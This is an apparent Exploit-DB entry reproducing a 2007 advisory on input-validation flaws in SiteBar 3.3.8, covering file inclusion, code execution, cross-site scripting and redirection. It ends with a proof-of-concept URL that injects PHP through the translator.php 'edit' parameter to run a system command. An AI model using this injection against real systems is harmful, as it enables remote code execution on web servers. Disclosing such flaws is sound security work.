SiteBar 3.3.8 - '/translator.php?upd/cmd/Action/edit' Arbitrary PHP Code Execution

EDB-ID:

30683


Platform:

PHP

Published:

2007-10-18

source: http://www.securityfocus.com/bid/26126/info
 
SiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
 
These issues include:
 
- A local file-include vulnerability
- Multiple arbitrary-script-code-execution vulnerabilities
- Multiple cross-site scripting vulnerabilities
- A URI-redirection vulnerability.
 
Exploiting these issues can allow attackers to access potentially sensitive information, to execute arbitrary script code in the context of the webserver process, to steal cookie-based authentication credentials, and to redirect users to malicious webpages.
 
SiteBar 3.3.8 and prior versions are vulnerable. 

http://www.example.com/translator.php?lang=zh_CN&cmd=upd&edit=$GET[%22lang%22];system(%22uname%20-a%22);